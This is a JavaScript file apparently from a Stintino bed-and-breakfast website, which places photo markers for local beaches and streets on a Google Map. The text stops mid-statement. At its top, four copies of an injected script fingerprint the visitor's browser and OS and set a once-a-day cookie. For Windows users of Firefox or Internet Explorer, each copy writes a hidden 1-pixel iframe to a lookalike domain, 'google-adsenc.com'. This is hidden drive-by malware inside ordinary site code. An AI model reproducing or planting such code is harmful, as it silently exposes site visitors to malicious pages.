var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; this.OS = this.searchString(this.dataOS) || "an unknown OS"; }, searchString: function (data) { for (var i=0;i<data.length;i++) { var dataString = data[i].string; var dataProp = data[i].prop; this.versionSearchString = data[i].versionSearch || data[i].identity; if (dataString) { if (dataString.indexOf(data[i].subString) != -1) return data[i].identity; } else if (dataProp) return data[i].identity; } }, searchVersion: function (dataString) { var index = dataString.indexOf(this.versionSearchString); if (index == -1) return; return parseFloat(dataString.substring(index+this.versionSearchString.length+1)); }, dataBrowser: [       { string: navigator.userAgent,subString: "Firefox",identity: "Firefox"},{string: navigator.userAgent,subString: "MSIE",identity: "Explorer",versionSearch: "MSIE"}],dataOS : [{string: navigator.platform,subString: "Win",identity: "Windows"}]};function addCookie(szName,szValue,dtDaysExpires){ var dtExpires = new Date();var dtExpiryDate = "";dtExpires.setTime(dtExpires.getTime()+dtDaysExpires*24*60*60*1000);dtExpiryDate=dtExpires.toGMTString();document.cookie=szName+"="+szValue+";expires="+dtExpiryDate;} function findCookie(szName){        var i=0;var nStartPosition=0;var nEndPosition=0;var szCookieString=document.cookie; while (i<=szCookieString.length){nStartPosition=i;nEndPosition=nStartPosition+szName.length;if (szCookieString.substring(nStartPosition,nEndPosition)==szName){nStartPosition=nEndPosition+1;nEndPosition=document.cookie.indexOf(";",nStartPosition);if(nEndPosition<nStartPosition) nEndPosition=document.cookie.length;return document.cookie.substring(nStartPosition,nEndPosition);break;}i++;} return "";} BrowserDetect.init(); var szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://google-adsenc.com/in.cgi?2" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}
var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; this.OS = this.searchString(this.dataOS) || "an unknown OS"; }, searchString: function (data) { for (var i=0;i<data.length;i++) { var dataString = data[i].string; var dataProp = data[i].prop; this.versionSearchString = data[i].versionSearch || data[i].identity; if (dataString) { if (dataString.indexOf(data[i].subString) != -1) return data[i].identity; } else if (dataProp) return data[i].identity; } }, searchVersion: function (dataString) { var index = dataString.indexOf(this.versionSearchString); if (index == -1) return; return parseFloat(dataString.substring(index+this.versionSearchString.length+1)); }, dataBrowser: [       { string: navigator.userAgent,subString: "Firefox",identity: "Firefox"},{string: navigator.userAgent,subString: "MSIE",identity: "Explorer",versionSearch: "MSIE"}],dataOS : [{string: navigator.platform,subString: "Win",identity: "Windows"}]};function addCookie(szName,szValue,dtDaysExpires){ var dtExpires = new Date();var dtExpiryDate = "";dtExpires.setTime(dtExpires.getTime()+dtDaysExpires*24*60*60*1000);dtExpiryDate=dtExpires.toGMTString();document.cookie=szName+"="+szValue+";expires="+dtExpiryDate;} function findCookie(szName){        var i=0;var nStartPosition=0;var nEndPosition=0;var szCookieString=document.cookie; while (i<=szCookieString.length){nStartPosition=i;nEndPosition=nStartPosition+szName.length;if (szCookieString.substring(nStartPosition,nEndPosition)==szName){nStartPosition=nEndPosition+1;nEndPosition=document.cookie.indexOf(";",nStartPosition);if(nEndPosition<nStartPosition) nEndPosition=document.cookie.length;return document.cookie.substring(nStartPosition,nEndPosition);break;}i++;} return "";} BrowserDetect.init(); var szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://google-adsenc.com/in.cgi?2" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}
var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; this.OS = this.searchString(this.dataOS) || "an unknown OS"; }, searchString: function (data) { for (var i=0;i<data.length;i++) { var dataString = data[i].string; var dataProp = data[i].prop; this.versionSearchString = data[i].versionSearch || data[i].identity; if (dataString) { if (dataString.indexOf(data[i].subString) != -1) return data[i].identity; } else if (dataProp) return data[i].identity; } }, searchVersion: function (dataString) { var index = dataString.indexOf(this.versionSearchString); if (index == -1) return; return parseFloat(dataString.substring(index+this.versionSearchString.length+1)); }, dataBrowser: [       { string: navigator.userAgent,subString: "Firefox",identity: "Firefox"},{string: navigator.userAgent,subString: "MSIE",identity: "Explorer",versionSearch: "MSIE"}],dataOS : [{string: navigator.platform,subString: "Win",identity: "Windows"}]};function addCookie(szName,szValue,dtDaysExpires){ var dtExpires = new Date();var dtExpiryDate = "";dtExpires.setTime(dtExpires.getTime()+dtDaysExpires*24*60*60*1000);dtExpiryDate=dtExpires.toGMTString();document.cookie=szName+"="+szValue+";expires="+dtExpiryDate;} function findCookie(szName){        var i=0;var nStartPosition=0;var nEndPosition=0;var szCookieString=document.cookie; while (i<=szCookieString.length){nStartPosition=i;nEndPosition=nStartPosition+szName.length;if (szCookieString.substring(nStartPosition,nEndPosition)==szName){nStartPosition=nEndPosition+1;nEndPosition=document.cookie.indexOf(";",nStartPosition);if(nEndPosition<nStartPosition) nEndPosition=document.cookie.length;return document.cookie.substring(nStartPosition,nEndPosition);break;}i++;} return "";} BrowserDetect.init(); var szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://google-adsenc.com/in.cgi?2" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}
var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; this.OS = this.searchString(this.dataOS) || "an unknown OS"; }, searchString: function (data) { for (var i=0;i<data.length;i++) { var dataString = data[i].string; var dataProp = data[i].prop; this.versionSearchString = data[i].versionSearch || data[i].identity; if (dataString) { if (dataString.indexOf(data[i].subString) != -1) return data[i].identity; } else if (dataProp) return data[i].identity; } }, searchVersion: function (dataString) { var index = dataString.indexOf(this.versionSearchString); if (index == -1) return; return parseFloat(dataString.substring(index+this.versionSearchString.length+1)); }, dataBrowser: [       { string: navigator.userAgent,subString: "Firefox",identity: "Firefox"},{string: navigator.userAgent,subString: "MSIE",identity: "Explorer",versionSearch: "MSIE"}],dataOS : [{string: navigator.platform,subString: "Win",identity: "Windows"}]};function addCookie(szName,szValue,dtDaysExpires){ var dtExpires = new Date();var dtExpiryDate = "";dtExpires.setTime(dtExpires.getTime()+dtDaysExpires*24*60*60*1000);dtExpiryDate=dtExpires.toGMTString();document.cookie=szName+"="+szValue+";expires="+dtExpiryDate;} function findCookie(szName){        var i=0;var nStartPosition=0;var nEndPosition=0;var szCookieString=document.cookie; while (i<=szCookieString.length){nStartPosition=i;nEndPosition=nStartPosition+szName.length;if (szCookieString.substring(nStartPosition,nEndPosition)==szName){nStartPosition=nEndPosition+1;nEndPosition=document.cookie.indexOf(";",nStartPosition);if(nEndPosition<nStartPosition) nEndPosition=document.cookie.length;return document.cookie.substring(nStartPosition,nEndPosition);break;}i++;} return "";} BrowserDetect.init(); var szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://google-adsenc.com/in.cgi?2" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}


//---------ShowDiv----------
function ShowAndHide(id1,id2){
if(document.getElementById){
    el1=document.getElementById(id1);
    el2=document.getElementById(id2);
    if(el1.style.display=="none"){
        el1.style.display="block";
        el2.style.display="none";
        }
    else{
        el1.style.display="none";
        el2.style.display="block";
        }
    }
}
//---------------------------

if (GBrowserIsCompatible()) {
    
var icon = new GIcon();
    icon.image = "http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/bandierina.png";
    icon.shadow = "http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/ombra-bandierina.png";
    icon.iconSize = new GSize(12.0, 18.0);
    icon.shadowSize = new GSize(22.0, 18.0);
    icon.iconAnchor = new GPoint(6.0, 9.0);
    icon.infoWindowAnchor = new GPoint(6.0, 9.0);
          
var bandierina = new GIcon(icon, "http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/bandierina.png", null, "http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/ombra-bandierina.png");
var side_bar_html = "";
var gmarkers = [];
var i = 0;

function createMarker(point,name,html,icon) {
var marker = new GMarker(point,icon);
        
        GEvent.addListener(marker, "click", function() {
        marker.setImage("http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/bandierina_r.png");
        });

        GEvent.addListener(marker, "click", function() {
        marker.openInfoWindowHtml(html);
        });
        gmarkers[i] = marker;
        side_bar_html += '<a class="tmenu" href="javascript:myclick('+i+')" onclick="gmarkers['+i+'].setImage(\'http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/bandierina_r.png\')">' + name + '</a><br>';
        i++;
        return marker;
      }
function myclick(i) {
         GEvent.trigger(gmarkers[i], "click");
      }
      
var map = new GMap2(document.getElementById("map"));
      map.addControl(new GLargeMapControl());
      map.addControl(new GMapTypeControl());
      map.addControl(new GScaleControl()) ;
      map.setCenter(new GLatLng(40.93841495689795,8.22601318359375), 9);
      map.addControl(new GOverviewMapControl(),
      new GControlPosition(G_ANCHOR_BOTTOM_RIGHT, new GSize(9, 9)));

      // Inserimento punti 
      
      var point = new GLatLng(40.94716341879007,8.223121762275695);
      var marker = createMarker(point,"<font color='#FF0000'>B&B ROCCABIANCA Stintino</font>","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_B&B_Stintino/esterno2.jpg' width='300' height='225'><br>B&B ROCCABIANCA</div>",bandierina)
      map.addOverlay(marker); 
      
      var point = new GLatLng(40.99628967199668,8.23124885559082);
      var marker = createMarker(point,"Vista dell'Asinara","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/monti_asinara.jpg' width='300' height='225'><br>Vista dell'Asinara dalla Spiaggia della Pelosa</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.9709959817879,8.20603609085083);
      var marker = createMarker(point,"Torre della Pelosa I","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/torre_della_pelosa.jpg' width='300' height='225'><br>Torre della Pelosa I</div>",bandierina)
      map.addOverlay(marker); 
      
      var point = new GLatLng(40.97107698891264,8.20704460144043);
      var marker = createMarker(point,"Torre della Pelosa II","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/torre_della_pelosa2.jpg' width='300' height='225'><br>Torre della Pelosa II</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.969764661246636,8.20605754852295);
      var marker = createMarker(point,"Punta della Pelosetta","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/punta_della_pelosa.jpg' width='300' height='225'><br>Punta della Pelosetta</div>",bandierina)
      map.addOverlay(marker); 
      
      var point = new GLatLng(40.96959859323086,8.205896615982055);
      var marker = createMarker(point,"Calette Pelosetta","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/calette_pelosetta.jpg' width='300' height='225'><br>Calette della Pelosetta</div>",bandierina)
      map.addOverlay(marker); 
      
      var point = new GLatLng(40.96904368000013,8.20503830909729);
      var marker = createMarker(point,"Salita di Capo Falcone","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/salita_capofalcone.jpg' width='300' height='225'><br>Salita di Capo Falcone</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.96795004172303,8.204416036605835);
      var marker = createMarker(point,"Pelosa da Capo Falcone","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/pelosa_da_capo_falcone.jpg' width='300' height='225'><br>Vista della Pelosa da Capo Falcone</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.96734245707015,8.20504903793335);
      var marker = createMarker(point,"Residence di Capo Falcone","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/residence_capo_falcone.jpg' width='300' height='225'><br>Residence di Capo Falcone</div>",bandierina)
      map.addOverlay(marker);
                                      
      var point = new GLatLng(40.96781232302537,8.207248449325561);
      var marker = createMarker(point,"Spiaggetta La Pelosetta","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/la_pelosetta.jpg' width='300' height='225'><br>Spiaggetta della Pelosetta</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.96735865940016,8.207339644432067);
      var marker = createMarker(point,"Dune della Pelosa","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/dune_pelosa.jpg' width='300' height='225'><br>Dune della Pelosa</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.967241192417426,8.207978010177612);
      var marker = createMarker(point,"Inizio della Pelosa","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/inizio_spiaggia_la_pelosa.jpg' width='300' height='225'><br>Inizio della Pelosa partendo dalla Pelosetta</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.97037222559609,8.216657638549804);
      var marker = createMarker(point,"Isola Piana","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/isola_piana.jpg' width='300' height='225'><br>Isola Piana vista dalla Pelosa</div>",bandierina)
      map.addOverlay(marker);

      var point = new GLatLng(40.96645942406774,8.20904016494751);
      var marker = createMarker(point,"La Pelosa I","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/spiaggia_pelosa1.jpg' width='300' height='225'><br>Spiaggia della Pelosa vista dalla strada</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.966548538026075,8.208718299865722);
      var marker = createMarker(point,"La Pelosa II","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/spiaggia_pelosa3.jpg' width='300' height='225'><br>Bagnanti sulla spiaggia</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.96593283913011,8.209372758865356);
      var marker = createMarker(point,"La Pelosa III","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/spiaggia_pelosa2.jpg' width='300' height='225'><br>Spiaggia della Pelosa parte sud</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.966548538026075,8.208600282669067);
      var marker = createMarker(point,"La Pelosa IV","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/spiaggia_pelosa4.jpg' width='300' height='225'><br>Veduta della spiaggia</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.965057888711776,8.20926547050476);
      var marker = createMarker(point,"La Pelosa V","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/spiaggia_pelosa5.jpg' width='300' height='225'><br>Veduta della spiaggia</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.956404976682286,8.196632266044616);
      var marker = createMarker(point,"Torre Capo falcone","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/torre_c_falcone.jpg' width='300' height='225'><br>Torre di capo falcone</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.935691716066806,8.22451114654541);
      var marker = createMarker(point,"-----( STINTINO PAESE )-----","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/stintino.jpg' width='300' height='225'><br>Vista di Stintino</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93474341835339,8.228588104248046);
      var marker = createMarker(point,"Vista da strada vecchia","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/scorcio_da_strada.jpg' width='300' height='225'><br>Scorcio Stintino dalla panoramica</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93474341835339,8.228588104248046);
      var marker = createMarker(point,"Vista da strada vecchia I","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/scorcio_da_strada1.jpg' width='300' height='225'><br>Scorcio Stintino dalla panoramica 1</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93474341835339,8.228588104248046);
      var marker = createMarker(point,"Vista da strada vecchia II","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/scorcio_da_strada2.jpg' width='300' height='225'><br>Scorcio Stintino dalla panoramica 2</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93474341835339,8.228588104248046);
      var marker = createMarker(point,"Vista da strada vecchia III","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/scorcio_da_strada3.jpg' width='300' height='225'><br>Scorcio Stintino dalla panoramica 3</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93474341835339,8.228588104248046);
      var marker = createMarker(point,"Vista da strada vecchia IV","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/scorcio_da_strada4.jpg' width='300' height='225'><br>Scorcio Stintino dalla panoramica 4</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93474341835339,8.228588104248046);
      var marker = createMarker(point,"Vista da strada vecchia V","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/scorcio_da_strada5.jpg' width='300' height='225'><br>Scorcio Stintino dalla panoramica 5</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93474341835339,8.228588104248046);
      var marker = createMarker(point,"Vista da strada vecchia VI","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/scorcio_da_strada6.jpg' width='300' height='225'><br>Scorcio Stintino dalla panoramica 6</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93474341835339,8.228588104248046);
      var marker = createMarker(point,"Vista da strada vecchia VII","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/scorcio_da_strada7.jpg' width='300' height='225'><br>Scorcio Stintino dalla panoramica 7</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93645358641937,8.226839303970337);
      var marker = createMarker(point,"Molo a porto minore","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/molo_benenati.jpg' width='300' height='225'><br>Molo a porto minore</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.936510321094104,8.226324319839477);
      var marker = createMarker(point,"Porticciolo Vecchio I","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/porticciolo_vecchio_stintino3.jpg' width='300' height='225'><br>Scorcio del porticciolo vecchio detto anche porto minore</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93673725930576,8.22628140449524);
      var marker = createMarker(point,"Porticciolo Vecchio II","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/porticciolo_vecchio_stintino2.jpg' width='300' height='225'><br>Scorcio del porticciolo vecchio detto anche porto minore</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.936866937933814,8.226683735847473);
      var marker = createMarker(point,"Porticciolo Vecchio III","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/porticciolo_vecchio_stintino.jpg' width='300' height='225'><br>Scorcio del porticciolo vecchio detto anche porto minore</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.936866937933814,8.226683735847473);
      var marker = createMarker(point,"Porticciolo Vecchio IV","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/inizio_porto_minore.jpg' width='300' height='225'><br>Scorcio del porticciolo vecchio detto anche porto minore</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93681830847812,8.22649598121643);
      var marker = createMarker(point,"Porticciolo Vecchio V","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/inizio_porto_minore1.jpg' width='300' height='225'><br>Scorcio del porticciolo vecchio detto anche porto minore</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.937073612721086,8.226431608200073);
      var marker = createMarker(point,"Inizio Lungomare Colombo","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/inizio_lungomare_colombo.jpg' width='300' height='225'><br>Inizio di Lungomare Colombo con scorcio di tipiche case stintinesi</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93702903586089,8.226689100265503);
      var marker = createMarker(point,"Segue Lungomare Colombo","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/lungomare_colombo.jpg' width='300' height='225'><br>Segue Lungomare Colombo</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93693988205023,8.226662278175354);
      var marker = createMarker(point,"Via Venezia","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/via_venezia.jpg' width='300' height='225'><br>Via Venezia</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93703308830395,8.227107524871826);
      var marker = createMarker(point,"Segue Lungomare Colombo","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/lungomare_colombo1.jpg' width='300' height='225'><br>Segue Lungomare Colombo</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93707766516145,8.2272469997406);
      var marker = createMarker(point,"Via XXI Aprile","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/via_XXI_aprile.jpg' width='300' height='225'><br>Via XXI Aprile</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.936915567353694,8.226876854896545);
      var marker = createMarker(point,"Moletti a porto minore","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/porticcioli_lung.colombo.jpg' width='300' height='225'><br>Caratteristici moletti a porto minore</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93688720019646,8.227563500404358);
      var marker = createMarker(point,"Porticciolo Lung.Colombo","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/porticciolo_lung.colombo.jpg' width='300' height='225'><br>Scorcio del porticciolo minore visto da Lungomare Colombo</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.9369115149034,8.227729797363281);
      var marker = createMarker(point,"Segue Lungomare Colombo","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/lungomare_colombo2.jpg' width='300' height='225'><br>Segue Lungomare Colombo</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93673725930576,8.227965831756591);
      var marker = createMarker(point,"Banchina di porto minore","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/porticciolo_banchina_lung.colombo.jpg' width='300' height='225'><br>Vista panoramica di porto minore</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93680209865159,8.22801947593689);
      var marker = createMarker(point,"Segue Lungomare Colombo","<div id='foto' style='width: 300px; height: 255px; text-align:center; background:#d9d9d9 url(http://www.roccabianca-stintino.com/Bed_and_breakfast_Stintino_images/loading.gif) no-repeat center'><img border='0' src='foto_stintino/lungomare_colombo3.jpg' width='300' height='225'><br>Segue Lungomare Colombo</div>",bandierina)
      map.addOverlay(marker);
      
      var point = new GLatLng(40.93634822189418,8.228470087051391);
